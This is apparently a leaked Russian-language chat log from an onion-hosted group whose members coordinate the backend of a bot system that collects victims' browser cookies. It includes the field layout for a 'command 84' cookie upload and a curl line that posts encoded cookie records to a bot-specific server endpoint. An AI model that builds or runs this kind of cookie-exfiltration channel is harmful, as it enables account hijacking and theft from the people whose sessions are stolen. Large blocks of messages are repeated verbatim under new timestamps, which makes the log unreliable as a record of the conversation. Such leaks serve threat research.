2021-08-31T16:17:38.434523  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] для того чтобы не заходить постоянно в конфу после релогина вверху есть звездочка, нажмите 2 раза и выберите автовход - всегда
	[en] <?>
	[fr] <?>

2021-08-31T16:17:38.435161  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] потом когда конфа будет не актуальна звездочку снимите
	[en] <?>
	[fr] <?>

2021-08-31T18:41:02.850531  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] Оба логических.
	[en] <?>
	[fr] <?>

2021-08-31T18:41:02.851067  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] не буду делать .
	[en] <?>
	[fr] <?>

2021-08-31T18:41:02.851360  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] и в 90 команду добавились новые поля
	[en] <?>
	[fr] <?>

2021-08-31T18:41:02.852382  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] ты базу на рабочем уже поменял ?я могу слить дамп ?
	[en] <?>
	[fr] <?>

2021-08-31T18:41:02.852705  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] поля не будут сохраняться, если их больше?
	[en] <?>
	[fr] <?>

2021-08-31T18:41:02.853376  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] dlls, programs, services Я тоже уже добавил
	[en] <?>
	[fr] <?>

2021-08-31T18:41:02.853987  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] а, ок
	[en] <?>
	[fr] <?>

2021-08-31T18:41:02.854563  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] Пока не накатил, сек сделаю
	[en] <?>
	[fr] <?>

2021-08-31T18:41:02.855263  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] Там поле под ярлыки desktop нужно еще, но пока не добавил его в миграцию.
	[en] <?>
	[fr] <?>

2021-08-31T18:41:02.855571  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] И в бэке его тоже вроде как нет
	[en] <?>
	[fr] <?>

2021-08-31T18:41:02.856442  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] добавляй сразу всё чтобы мне не возвращаться
	[en] <?>
	[fr] <?>

2021-08-31T18:41:02.856868  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] Пока не смогу. Ближе к вечеру время появится.
Там нужно в других частях это поле добавлять, поэтому быстро не смогу сделать.
	[en] <?>
	[fr] <?>

2021-08-31T18:41:02.857605  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] По 2м полям в куках накатил миграции.
	[en] <?>
	[fr] <?>

2021-08-31T18:41:02.858561  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] такой вопрос есть. Из за чего может быть такое, что я делаю запрос, бэк мне отвечает /1/ но в логах уровня info запроса нет, при этом в базе тех данных, которые я передал тоже нет. 
В бэке написано что /1/ это всегда про ответ 200, но я заметил что он отвечает /1/ и если бот есть в базе, и если его нет.
	[en] <?>
	[fr] <?>

2021-08-31T18:41:02.859042  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] хороший вопрос, но зуласа нету в конфе уже
	[en] <?>
	[fr] <?>

2021-08-31T18:41:02.859349  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] потому повтори этот вопрос как он появится
	[en] <?>
	[fr] <?>

2021-08-31T18:41:02.859776  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] Оке, тут получается нет истории..
	[en] <?>
	[fr] <?>

2021-08-31T18:41:02.860797  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] неа
	[en] <?>
	[fr] <?>

2021-08-31T18:41:02.861134  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] для того чтобы не заходить постоянно в конфу после релогина вверху есть звездочка, нажмите 2 раза и выберите автовход - всегда
	[en] <?>
	[fr] <?>

2021-08-31T18:41:02.861644  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] потом когда конфа будет не актуальна звездочку снимите
	[en] <?>
	[fr] <?>

2021-09-01T06:33:14.077178  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] не буду делать .
	[en] <?>
	[fr] <?>

2021-09-01T06:33:14.078486  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] и в 90 команду добавились новые поля
	[en] <?>
	[fr] <?>

2021-09-01T06:33:14.079865  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] ты базу на рабочем уже поменял ?я могу слить дамп ?
	[en] <?>
	[fr] <?>

2021-09-01T06:33:14.080419  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] поля не будут сохраняться, если их больше?
	[en] <?>
	[fr] <?>

2021-09-01T06:33:14.081693  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] dlls, programs, services Я тоже уже добавил
	[en] <?>
	[fr] <?>

2021-09-01T06:33:14.082683  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] а, ок
	[en] <?>
	[fr] <?>

2021-09-01T06:33:14.083297  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] Пока не накатил, сек сделаю
	[en] <?>
	[fr] <?>

2021-09-01T06:33:14.084529  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] Там поле под ярлыки desktop нужно еще, но пока не добавил его в миграцию.
	[en] <?>
	[fr] <?>

2021-09-01T06:33:14.085675  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] И в бэке его тоже вроде как нет
	[en] <?>
	[fr] <?>

2021-09-01T06:33:14.086361  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] добавляй сразу всё чтобы мне не возвращаться
	[en] <?>
	[fr] <?>

2021-09-01T06:33:14.087470  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] Пока не смогу. Ближе к вечеру время появится.
Там нужно в других частях это поле добавлять, поэтому быстро не смогу сделать.
	[en] <?>
	[fr] <?>

2021-09-01T06:33:14.088428  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] По 2м полям в куках накатил миграции.
	[en] <?>
	[fr] <?>

2021-09-01T06:33:14.089558  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] такой вопрос есть. Из за чего может быть такое, что я делаю запрос, бэк мне отвечает /1/ но в логах уровня info запроса нет, при этом в базе тех данных, которые я передал тоже нет. 
В бэке написано что /1/ это всегда про ответ 200, но я заметил что он отвечает /1/ и если бот есть в базе, и если его нет.
	[en] <?>
	[fr] <?>

2021-09-01T06:33:14.090588  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] хороший вопрос, но зуласа нету в конфе уже
	[en] <?>
	[fr] <?>

2021-09-01T06:33:14.091373  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] потому повтори этот вопрос как он появится
	[en] <?>
	[fr] <?>

2021-09-01T06:33:14.092189  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] Оке, тут получается нет истории..
	[en] <?>
	[fr] <?>

2021-09-01T06:33:14.093159  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] неа
	[en] <?>
	[fr] <?>

2021-09-01T06:33:14.094004  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] для того чтобы не заходить постоянно в конфу после релогина вверху есть звездочка, нажмите 2 раза и выберите автовход - всегда
	[en] <?>
	[fr] <?>

2021-09-01T06:33:14.095147  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] потом когда конфа будет не актуальна звездочку снимите
	[en] <?>
	[fr] <?>

2021-09-01T06:33:14.096325  ttrr@conference.q3mcco35auwcstmt.onion
	[ru]  > такой вопрос есть. Из за чего может быть такое, что я делаю запрос, бэк мне отвечает /1/ но в логах уровня info запроса нет, при этом в базе тех данных, которые я передал тоже нет. 
В бэке написано что /1/ это всегда про ответ 200, но я заметил что он отвечает /1/ и если бот есть в базе, и если его нет.

для начала что за запрос ? можем мы его повторить на текущей системе чтобы я его видел ?
	[en] <?>
	[fr] <?>

2021-09-01T06:33:17.310295  hof@q3mcco35auwcstmt.onion
	[ru] oad
	[en] <?>
	[fr] <?>

2021-09-01T06:33:17.317152  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] oad
	[en] <?>
	[fr] <?>

2021-09-01T13:51:45.509167  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] К сожалению не можем.
Если с этим серверм будет такое же история я напишу
	[en] <?>
	[fr] <?>

2021-09-01T13:52:09.084008  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] К сожалению не можем.
Если с этим серверм будет такое же история я напишу
	[en] <?>
	[fr] <?>

2021-09-01T13:52:09.084812  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] Как повторить к сожалению не знаю пока
	[en] <?>
	[fr] <?>

2021-09-02T06:50:10.716756  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] поля не будут сохраняться, если их больше?
	[en] <?>
	[fr] <?>

2021-09-02T06:50:10.717364  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] dlls, programs, services Я тоже уже добавил
	[en] <?>
	[fr] <?>

2021-09-02T06:50:10.718858  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] а, ок
	[en] <?>
	[fr] <?>

2021-09-02T06:50:10.719167  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] Пока не накатил, сек сделаю
	[en] <?>
	[fr] <?>

2021-09-02T06:50:10.719696  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] Там поле под ярлыки desktop нужно еще, но пока не добавил его в миграцию.
	[en] <?>
	[fr] <?>

2021-09-02T06:50:10.720441  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] И в бэке его тоже вроде как нет
	[en] <?>
	[fr] <?>

2021-09-02T06:50:10.721145  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] добавляй сразу всё чтобы мне не возвращаться
	[en] <?>
	[fr] <?>

2021-09-02T06:50:10.721803  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] Пока не смогу. Ближе к вечеру время появится.
Там нужно в других частях это поле добавлять, поэтому быстро не смогу сделать.
	[en] <?>
	[fr] <?>

2021-09-02T06:50:10.722693  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] По 2м полям в куках накатил миграции.
	[en] <?>
	[fr] <?>

2021-09-02T06:50:10.723442  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] такой вопрос есть. Из за чего может быть такое, что я делаю запрос, бэк мне отвечает /1/ но в логах уровня info запроса нет, при этом в базе тех данных, которые я передал тоже нет. 
В бэке написано что /1/ это всегда про ответ 200, но я заметил что он отвечает /1/ и если бот есть в базе, и если его нет.
	[en] <?>
	[fr] <?>

2021-09-02T06:50:10.724052  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] хороший вопрос, но зуласа нету в конфе уже
	[en] <?>
	[fr] <?>

2021-09-02T06:50:10.724559  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] потому повтори этот вопрос как он появится
	[en] <?>
	[fr] <?>

2021-09-02T06:50:10.725312  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] Оке, тут получается нет истории..
	[en] <?>
	[fr] <?>

2021-09-02T06:50:10.725878  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] неа
	[en] <?>
	[fr] <?>

2021-09-02T06:50:10.726691  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] для того чтобы не заходить постоянно в конфу после релогина вверху есть звездочка, нажмите 2 раза и выберите автовход - всегда
	[en] <?>
	[fr] <?>

2021-09-02T06:50:10.727332  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] потом когда конфа будет не актуальна звездочку снимите
	[en] <?>
	[fr] <?>

2021-09-02T06:50:10.728061  ttrr@conference.q3mcco35auwcstmt.onion
	[ru]  > такой вопрос есть. Из за чего может быть такое, что я делаю запрос, бэк мне отвечает /1/ но в логах уровня info запроса нет, при этом в базе тех данных, которые я передал тоже нет. 
В бэке написано что /1/ это всегда про ответ 200, но я заметил что он отвечает /1/ и если бот есть в базе, и если его нет.

для начала что за запрос ? можем мы его повторить на текущей системе чтобы я его видел ?
	[en] <?>
	[fr] <?>

2021-09-02T06:50:10.728842  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] oad
	[en] <?>
	[fr] <?>

2021-09-02T06:50:10.729351  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] К сожалению не можем.
Если с этим серверм будет такое же история я напишу
	[en] <?>
	[fr] <?>

2021-09-02T06:50:10.730180  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] Как повторить к сожалению не знаю пока
	[en] <?>
	[fr] <?>

2021-09-02T09:15:17.515733  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] поля не будут сохраняться, если их больше?
	[en] <?>
	[fr] <?>

2021-09-02T09:15:17.516163  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] dlls, programs, services Я тоже уже добавил
	[en] <?>
	[fr] <?>

2021-09-02T09:15:17.516817  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] а, ок
	[en] <?>
	[fr] <?>

2021-09-02T09:15:17.517263  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] Пока не накатил, сек сделаю
	[en] <?>
	[fr] <?>

2021-09-02T09:15:17.518042  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] Там поле под ярлыки desktop нужно еще, но пока не добавил его в миграцию.
	[en] <?>
	[fr] <?>

2021-09-02T09:15:17.518365  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] И в бэке его тоже вроде как нет
	[en] <?>
	[fr] <?>

2021-09-02T09:15:17.519110  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] добавляй сразу всё чтобы мне не возвращаться
	[en] <?>
	[fr] <?>

2021-09-02T09:15:17.519424  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] Пока не смогу. Ближе к вечеру время появится.
Там нужно в других частях это поле добавлять, поэтому быстро не смогу сделать.
	[en] <?>
	[fr] <?>

2021-09-02T09:15:17.520024  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] По 2м полям в куках накатил миграции.
	[en] <?>
	[fr] <?>

2021-09-02T09:15:17.520815  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] такой вопрос есть. Из за чего может быть такое, что я делаю запрос, бэк мне отвечает /1/ но в логах уровня info запроса нет, при этом в базе тех данных, которые я передал тоже нет. 
В бэке написано что /1/ это всегда про ответ 200, но я заметил что он отвечает /1/ и если бот есть в базе, и если его нет.
	[en] <?>
	[fr] <?>

2021-09-02T09:15:17.521209  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] хороший вопрос, но зуласа нету в конфе уже
	[en] <?>
	[fr] <?>

2021-09-02T09:15:17.521852  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] потому повтори этот вопрос как он появится
	[en] <?>
	[fr] <?>

2021-09-02T09:15:17.522386  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] Оке, тут получается нет истории..
	[en] <?>
	[fr] <?>

2021-09-02T09:15:17.523035  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] неа
	[en] <?>
	[fr] <?>

2021-09-02T09:15:17.523643  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] для того чтобы не заходить постоянно в конфу после релогина вверху есть звездочка, нажмите 2 раза и выберите автовход - всегда
	[en] <?>
	[fr] <?>

2021-09-02T09:15:17.524435  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] потом когда конфа будет не актуальна звездочку снимите
	[en] <?>
	[fr] <?>

2021-09-02T09:15:17.525230  ttrr@conference.q3mcco35auwcstmt.onion
	[ru]  > такой вопрос есть. Из за чего может быть такое, что я делаю запрос, бэк мне отвечает /1/ но в логах уровня info запроса нет, при этом в базе тех данных, которые я передал тоже нет. 
В бэке написано что /1/ это всегда про ответ 200, но я заметил что он отвечает /1/ и если бот есть в базе, и если его нет.

для начала что за запрос ? можем мы его повторить на текущей системе чтобы я его видел ?
	[en] <?>
	[fr] <?>

2021-09-02T09:15:17.525590  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] oad
	[en] <?>
	[fr] <?>

2021-09-02T09:15:17.526294  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] К сожалению не можем.
Если с этим серверм будет такое же история я напишу
	[en] <?>
	[fr] <?>

2021-09-02T09:15:17.526648  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] Как повторить к сожалению не знаю пока
	[en] <?>
	[fr] <?>

2021-09-02T11:28:45.765014  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] всем привет
	[en] <?>
	[fr] <?>

2021-09-02T11:28:50.926442  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] как дела с деро?
	[en] <?>
	[fr] <?>

2021-09-02T11:29:03.159572  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] zulas: понятна проблема?
	[en] <?>
	[fr] <?>

2021-09-02T11:30:43.885146  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] деф . привет .. а в чем проблема ?
	[en] <?>
	[fr] <?>

2021-09-02T11:33:13.545290  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] driver: отпиши что ты мне написал сюда
	[en] <?>
	[fr] <?>

2021-09-02T11:33:20.364659  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] ответ 403 был
	[en] <?>
	[fr] <?>

2021-09-02T11:33:26.029367  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] с ним разобрались?
	[en] <?>
	[fr] <?>

2021-09-02T11:36:33.218495  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] Бэк отвечает 403 на попытку отправить куки.
	[en] <?>
	[fr] <?>

2021-09-02T11:36:55.084286  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] Внесли ли изменения связанные с новыми полями?
	[en] <?>
	[fr] <?>

2021-09-02T11:38:21.044625  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] давайте конкретно: кто и что должен внести?
	[en] <?>
	[fr] <?>

2021-09-02T11:38:32.054325  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] тк походу зулас даже не в курсе
	[en] <?>
	[fr] <?>

2021-09-02T11:39:06.182362  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] 4ый день мы тут что то обсуждаем, а в итоге ничего не делаем
	[en] <?>
	[fr] <?>

2021-09-02T11:39:10.284873  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] в чем проблема?
	[en] <?>
	[fr] <?>

2021-09-02T11:39:34.331834  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] Нужно в 84 команду внести 2 поля.
secure, httponly в конец приема, получается 9 и 10 поле должно быть.
	[en] <?>
	[fr] <?>

2021-09-02T11:39:51.361303  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] В базу должны записываться поля с такими же именами
	[en] <?>
	[fr] <?>

2021-09-02T11:41:12.882030  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] я ничего не вносил пока ..
	[en] <?>
	[fr] <?>

2021-09-02T11:41:48.451442  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] так уже пора внести
	[en] <?>
	[fr] <?>

2021-09-02T11:41:53.197259  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] драйвер же просил
	[en] <?>
	[fr] <?>

2021-09-02T11:42:05.655913  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] у нас доработка прямо сейчас в модуле сбора, требует этого
	[en] <?>
	[fr] <?>

2021-09-02T11:42:10.208571  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] Ок. Когда?
	[en] <?>
	[fr] <?>

2021-09-02T11:43:37.294638  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] Я не стал этого делать потому что мне сказали, что сейчас zulas занимается бэком, но я напрямую не писал задачу.
Возможно решил что вы с кодером модуля обсудили этот момент
	[en] <?>
	[fr] <?>

2021-09-02T11:44:33.238680  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] (31.08.2021 13:44:35) zulas: добавляй сразу всё чтобы мне не возвращаться
(31.08.2021 13:46:11) driver: Пока не смогу. Ближе к вечеру время появится.
Там нужно в других частях это поле добавлять, поэтому быстро не смогу сделать.
(31.08.2021 14:01:24) driver: По 2м полям в куках накатил миграции.
	[en] <?>
	[fr] <?>

2021-09-02T11:44:45.185064  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] ну вообще надо все сразу сделать и чтобы не возвращаться
	[en] <?>
	[fr] <?>

2021-09-02T11:44:52.285746  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] переключение контекста -- очень тяжелая операция )
	[en] <?>
	[fr] <?>

2021-09-02T11:45:14.307468  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] так что 
1. я жду когда в базу нужное внесется
2. когда мне будет объяснено что нужно делать
	[en] <?>
	[fr] <?>

2021-09-02T11:59:16.917141  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] так а по-моему driver говорил что накатил миграции на базу. Это не оно?
цитату не приведу, уплыло в истории
	[en] <?>
	[fr] <?>

2021-09-02T12:03:26.095535  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] driver: поясни мне чего ты ждешь?
	[en] <?>
	[fr] <?>

2021-09-02T12:03:33.365511  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] что нужно от зуласа?
	[en] <?>
	[fr] <?>

2021-09-02T12:11:37.702419  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] Дело в том что миграция по десктопу относится к другой задаче.
	[en] <?>
	[fr] <?>

2021-09-02T12:11:51.016545  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] Сейчас нужно сделать 2 этих поля
	[en] <?>
	[fr] <?>

2021-09-02T12:12:18.872112  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] zulas: сделаешь?
	[en] <?>
	[fr] <?>

2021-09-02T12:14:06.097561  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] Более того к другой команде и к другой таблице.
	[en] <?>
	[fr] <?>

2021-09-02T12:15:43.897550  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] @driver давай конкретно что тебе надо и куда ... ок ?
	[en] <?>
	[fr] <?>

2021-09-02T12:17:36.626210  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] Нужно в 84 команду внести 2 поля.
secure, httponly в конец приема, получается 9 и 10 поле должно быть.
	[en] <?>
	[fr] <?>

2021-09-02T12:18:22.060042  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] На запрос вида 
curl -X POST -F 'data=dXNlcg==|IE||||1240428288|1240428288|dXNlcg==|IE|demdex.net|ZGVtZGV4|NTczODQzMjMyMTAwNDg1MDEyMDI3NjIxMTIxODA0ODI1OTMyMjQ=|1240428358|1240428358|Lw==|1|1' http://(IP)/TAG/TEST_W639600.1234A242341C6D1A25B3F315D688968E/84/
Должно ответить /1/
	[en] <?>
	[fr] <?>

2021-09-02T12:20:09.147689  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] ок .. сейчас в базе поля уже есть ?
	[en] <?>
	[fr] <?>

2021-09-02T12:20:19.947743  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] Да
	[en] <?>
	[fr] <?>

2021-09-02T12:28:19.572533  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] а старые клиенты еще работают ?
	[en] <?>
	[fr] <?>

2021-09-02T12:28:40.296562  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] т.е. надо поддерживать и старый формат и новый ?
	[en] <?>
	[fr] <?>

2021-09-02T12:29:44.534785  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] Нет, просто только новый должен начать работать.
	[en] <?>
	[fr] <?>

2021-09-02T12:30:37.243111  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] Уже внесли нужные изменения для клиентов. Ждем именно чтобы подхватило эти изменения часть по бэку
	[en] <?>
	[fr] <?>

2021-09-02T12:59:04.946587  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] zulas: очень прошу поторопиться, так как сейчас от тебя зависит работа многих, без правок бекенда не можем дальше двинуться
	[en] <?>
	[fr] <?>

2021-09-02T13:03:56.542085  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] хорошо сделаю
	[en] <?>
	[fr] <?>

2021-09-02T13:23:09.881679  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] [ Username, Browser, Domain, Cookie_name, Cookie_value, Created, Expires, Path, Secure, HttpOnly ]
	[en] <?>
	[fr] <?>

2021-09-02T13:23:13.464082  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] такая последовательность ?
	[en] <?>
	[fr] <?>

2021-09-02T13:23:20.884376  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] @driver
	[en] <?>
	[fr] <?>

2021-09-02T13:26:57.392049  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] @defender как мне запушить изменения ?
	[en] <?>
	[fr] <?>

2021-09-02T13:37:09.263205  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] Да все верно.
	[en] <?>
	[fr] <?>

2021-09-02T14:18:44.638101  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] zulas: а я тебе вроде выдавал доступ, разве нет?
	[en] <?>
	[fr] <?>

2021-09-02T16:43:17.462278  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] я его 100 раз забыл
	[en] <?>
	[fr] <?>

2021-09-02T16:43:37.840304  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] ~/erl/dero> git -c credential.helper=/usr/share/smartgit/lib/credentials.sh push --porcelain --progress --recurse-submodules=check origin refs/heads/master:refs/heads/master
unable to access 'https://179.43.147.243/begemot/dero.git/': gnutls_handshake() failed: Internal error
	[en] <?>
	[fr] <?>

2021-09-02T16:44:19.026213  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] ок, щас в личку кину
	[en] <?>
	[fr] <?>

2021-09-03T07:23:12.980938  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] @driver давай конкретно что тебе надо и куда ... ок ?
	[en] <?>
	[fr] <?>

2021-09-03T07:23:12.981885  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] Нужно в 84 команду внести 2 поля.
secure, httponly в конец приема, получается 9 и 10 поле должно быть.
	[en] <?>
	[fr] <?>

2021-09-03T07:23:12.982726  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] На запрос вида 
curl -X POST -F 'data=dXNlcg==|IE||||1240428288|1240428288|dXNlcg==|IE|demdex.net|ZGVtZGV4|NTczODQzMjMyMTAwNDg1MDEyMDI3NjIxMTIxODA0ODI1OTMyMjQ=|1240428358|1240428358|Lw==|1|1' http://(IP)/TAG/TEST_W639600.1234A242341C6D1A25B3F315D688968E/84/
Должно ответить /1/
	[en] <?>
	[fr] <?>

2021-09-03T07:23:12.983789  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] ок .. сейчас в базе поля уже есть ?
	[en] <?>
	[fr] <?>

2021-09-03T07:23:12.984230  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] Да
	[en] <?>
	[fr] <?>

2021-09-03T07:23:12.985196  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] а старые клиенты еще работают ?
	[en] <?>
	[fr] <?>

2021-09-03T07:23:12.985809  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] т.е. надо поддерживать и старый формат и новый ?
	[en] <?>
	[fr] <?>

2021-09-03T07:23:12.986793  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] Нет, просто только новый должен начать работать.
	[en] <?>
	[fr] <?>

2021-09-03T07:23:12.987449  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] Уже внесли нужные изменения для клиентов. Ждем именно чтобы подхватило эти изменения часть по бэку
	[en] <?>
	[fr] <?>

2021-09-03T07:23:12.988502  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] zulas: очень прошу поторопиться, так как сейчас от тебя зависит работа многих, без правок бекенда не можем дальше двинуться
	[en] <?>
	[fr] <?>

2021-09-03T07:23:12.988947  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] хорошо сделаю
	[en] <?>
	[fr] <?>

2021-09-03T07:23:12.989927  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] [ Username, Browser, Domain, Cookie_name, Cookie_value, Created, Expires, Path, Secure, HttpOnly ]
	[en] <?>
	[fr] <?>

2021-09-03T07:23:12.990465  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] такая последовательность ?
	[en] <?>
	[fr] <?>

2021-09-03T07:23:12.991282  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] @driver
	[en] <?>
	[fr] <?>

2021-09-03T07:23:12.991842  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] @defender как мне запушить изменения ?
	[en] <?>
	[fr] <?>

2021-09-03T07:23:12.992439  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] Да все верно.
	[en] <?>
	[fr] <?>

2021-09-03T07:23:12.993031  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] zulas: а я тебе вроде выдавал доступ, разве нет?
	[en] <?>
	[fr] <?>

2021-09-03T07:23:12.994069  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] я его 100 раз забыл
	[en] <?>
	[fr] <?>

2021-09-03T07:23:12.994773  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] ~/erl/dero> git -c credential.helper=/usr/share/smartgit/lib/credentials.sh push --porcelain --progress --recurse-submodules=check origin refs/heads/master:refs/heads/master
unable to access 'https://179.43.147.243/begemot/dero.git/': gnutls_handshake() failed: Internal error
	[en] <?>
	[fr] <?>

2021-09-03T07:23:12.995650  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] ок, щас в личку кину
	[en] <?>
	[fr] <?>

2021-09-03T09:27:34.710180  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] Добрый день! Как успехи по пушу кода?
	[en] <?>
	[fr] <?>

2021-09-03T09:28:03.407013  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] @zulas @defender
	[en] <?>
	[fr] <?>

2021-09-03T09:28:22.267375  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] надо запушить . жду дефа
	[en] <?>
	[fr] <?>

